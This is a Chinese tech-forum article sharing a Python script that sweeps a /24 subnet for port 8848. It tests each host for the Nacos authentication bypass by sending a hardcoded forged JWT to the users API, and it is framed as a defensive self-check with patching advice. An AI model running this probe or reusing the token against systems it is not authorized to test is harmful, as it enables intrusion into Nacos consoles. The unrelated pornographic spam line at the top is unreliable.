精品国产人成在线_亚洲高清无码在线观看_国产在线视频国产永久2021_国产AV综合第一页一个的一区免费影院黑人_最近中文字幕MV高清在线视频

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

基于python的漏洞掃描器

jf_TEuU2tls ? 來源:浩道linux ? 2023-08-07 09:27 ? 次閱讀

官方確認,低版本的nacos服務管理平臺存在多個安全漏洞。這些漏洞可能導致配置文件中的敏感信息泄漏或系統被入侵的風險。

今天浩道跟大家分享一個python腳本,主要用于自動檢測某網段內主機上可能存在的nacos漏洞,可以方便大家對某網段內多臺主機進行檢測,一起看看吧!

如存在漏洞,建議及時升級nacos服務管理平臺的版本,并修改默認密碼,刪除多余管理賬號。

nacos.py腳本信息如下,大家可以根據自己實際網段修改對應代碼即可。該腳本實現掃描的是192.168.100.0網段內主機上的nacos漏洞。

import requests
import urllib3
import threading
import socket


urllib3.disable_warnings()


# 定義自定義路徑和Header
custom_path = '/nacos/v1/auth/users?pageNo=1&pageSize=2'
header = {
    "User-Agent": "Nacos-Server",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Pragma": "no-cache",
    "Te": "trailers",
    "Cache-Control": "no-cache",
}


# 定義函數,用于發起GET請求并判斷回顯結果,每次調用這個函數發送一個請求
def send_request(url):
    full_url = url + custom_path  # 拼接完整URL
    try:
        response = requests.get(full_url, headers=header, verify=False, timeout=2)
        if response.status_code == 200 and response.content.find(b"pageNumber") != -1:
            print(f'{url} 存在nacos身份驗證繞過漏洞')
        else:
            print(f'{url} 不存在nacos身份驗證繞過漏洞')
    except requests.exceptions.RequestException as e:
        print(f'{url} 訪問失敗 {e}')


# Function to check if port 8848 is open on a given IP address
def is_port_open(ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(2)  # Set a timeout of 2 seconds for the connection attempt
    result = sock.connect_ex((ip, port))
    sock.close()
    return result == 0


# Scan the 192.168.100.1 network segment for hosts with port 8848 open
nacos_hosts = []
for i in range(1, 256):
    ip_address = f'192.168.100.{i}'
    if is_port_open(ip_address, 8848):
        nacos_hosts.append(ip_address)


# Perform Nacos vulnerability check for hosts with port 8848 open
if not nacos_hosts:
    print("No Nacos server found on port 8848 in the 192.168.100.1 network segment.")
else:
    print(f"Found Nacos server(s) on port 8848: {', '.join(nacos_hosts)}")
    threads = []
    for host in nacos_hosts:
        t = threading.Thread(target=send_request, args=(f"http://{host}:8848",))
        threads.append(t)
        t.start()


    # Wait for all threads to complete
    for t in threads:
        t.join()

以下針對三個網段執行腳本,如下圖所示:

bc369b98-34b4-11ee-9e74-dac502259ad0.png

bc5de446-34b4-11ee-9e74-dac502259ad0.png

bc7abef4-34b4-11ee-9e74-dac502259ad0.png

責任編輯:彭菁

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 文件
    +關注

    關注

    1

    文章

    561

    瀏覽量

    24695
  • 代碼
    +關注

    關注

    30

    文章

    4744

    瀏覽量

    68344
  • 漏洞
    +關注

    關注

    0

    文章

    204

    瀏覽量

    15358
  • python
    +關注

    關注

    56

    文章

    4782

    瀏覽量

    84449
  • 掃描器
    +關注

    關注

    0

    文章

    155

    瀏覽量

    11895

原文標題:【python實戰腳本分享】自動檢測nacos漏洞!

文章出處:【微信號:浩道linux,微信公眾號:浩道linux】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    用作掃描器的光電隔離電路

    用作掃描器的光電隔離電路
    發表于 12-23 17:38 ?700次閱讀
    用作<b class='flag-5'>掃描器</b>的光電隔離電路

    飛點掃描器掃描報警電路圖

    飛點掃描器掃描報警電路圖
    發表于 06-29 13:10 ?537次閱讀
    飛點<b class='flag-5'>掃描器</b>的<b class='flag-5'>掃描</b>報警電路圖

    HR3220的無線掃描器用戶手冊

    本手冊主要向用戶介紹NLS-HR3220系列無線式二維條碼掃描器(以下簡稱HR32無線掃描器掃描器)的使用方法。
    發表于 09-20 18:49 ?12次下載

    干貨:基于指紋識別的漏洞掃描設計方案

    漏洞掃描器大家都不陌生,幾乎是每家公司必備的安全產品。幾乎早在快10年前,作為安全乙方,就需要扛著一臺極光掃描器,到全國各地去做各種安服。在當時極光掃描器就是一款非常成熟的商業產品了,
    的頭像 發表于 07-07 11:46 ?3642次閱讀
    干貨:基于指紋識別的<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>設計方案

    I2C掃描器開源硬件

    電子發燒友網站提供《I2C掃描器開源硬件.zip》資料免費下載
    發表于 12-29 11:29 ?1次下載
    I2C<b class='flag-5'>掃描器</b>開源硬件

    XSS漏洞掃描器工具

    XSpear是一款基于RubyGems的的XSS漏洞掃描器。擁有常見的XSS漏洞掃描攻擊測試功能。還可進行參數分析。
    的頭像 發表于 01-17 09:28 ?1827次閱讀

    市場上可用的十大最佳漏洞掃描工具

    OpenVAS漏洞掃描器是一種漏洞分析工具,由于其全面的特性,可以使用它來掃描服務和網絡設備。這些掃描
    的頭像 發表于 03-08 09:49 ?4103次閱讀

    NanoBeacon? BLE掃描器教程

    到目前為止,我們已經發布了三個關于使用我們新的NanoBeacon? BLE掃描器移動應用程序的教程。
    的頭像 發表于 06-02 14:35 ?621次閱讀
    NanoBeacon? BLE<b class='flag-5'>掃描器</b>教程

    Android Things I2C地址掃描器

    電子發燒友網站提供《Android Things I2C地址掃描器.zip》資料免費下載
    發表于 06-13 17:02 ?0次下載
    Android Things I2C地址<b class='flag-5'>掃描器</b>

    紅光條碼掃描器、固定式掃描器廣泛應用于工業制造領域

    隨著科技的不斷進步,電子制造業、汽配行業、生產流水線等工業制造領域離不開紅光條碼掃描器。作為專用于掃描條碼、二維碼的掃描器,它在工業領域中扮演著重要的角色,因為它們可以幫助企業提高生產效率、減少
    的頭像 發表于 05-12 16:11 ?766次閱讀
    紅光條碼<b class='flag-5'>掃描器</b>、固定式<b class='flag-5'>掃描器</b>廣泛應用于工業制造領域

    一款網絡攝像頭漏洞掃描工具

    ? 項目地址:https://github.com/jorhelp/Ingram ? 簡介 主要針對網絡攝像頭的漏洞掃描框架,目前已集成海康、大華、宇視、dlink等常見設備 端口掃描器 我們可以
    的頭像 發表于 06-29 09:35 ?4100次閱讀
    一款網絡攝像頭<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>工具

    最常見的網絡安全12種漏洞掃描類型

    數據庫掃描技術主要用于評估數據庫系統的安全性,該類型會全面查找數據庫設置、訪問控制和存儲數據的漏洞,比如不安全的權限、漏洞注入問題或不安全的設置。這種掃描器需要經常提供用于保護數據庫和
    發表于 07-12 12:41 ?1421次閱讀
    最常見的網絡安全12種<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>類型

    網站常見漏洞checklist介紹

    在做網站滲透之前除了關注一些通用漏洞,這些漏洞通常能很容易的利用掃描器掃出,被WAF所防護,然而有一些邏輯漏洞WAF和掃描器就無法發現了,就
    的頭像 發表于 10-16 09:10 ?799次閱讀
    網站常見<b class='flag-5'>漏洞</b>checklist介紹

    什么是固定式條碼掃描器?固定式掃描器怎么選?

    1.產品特性固定式條碼掃描器以其高度的可靠性而聞名。這種設備的設計旨在提供無與倫比的性能,無論是在高速掃描還是長時間持續工作的環境下。其多種掃描模式使其能夠適應各種不同的應用環境,無論是需要快速
    的頭像 發表于 05-23 14:47 ?488次閱讀
    什么是固定式條碼<b class='flag-5'>掃描器</b>?固定式<b class='flag-5'>掃描器</b>怎么選?

    嵌入式條碼掃描器的幾種掃描模式

    嵌入式條碼掃描器掃描模式是指其在識別條碼時的工作模式,這些模式會影響到掃描器的使用效果和適用場景。以下是幾種常見的嵌入式條碼掃描器掃描
    的頭像 發表于 11-19 16:27 ?102次閱讀
    嵌入式條碼<b class='flag-5'>掃描器</b>的幾種<b class='flag-5'>掃描</b>模式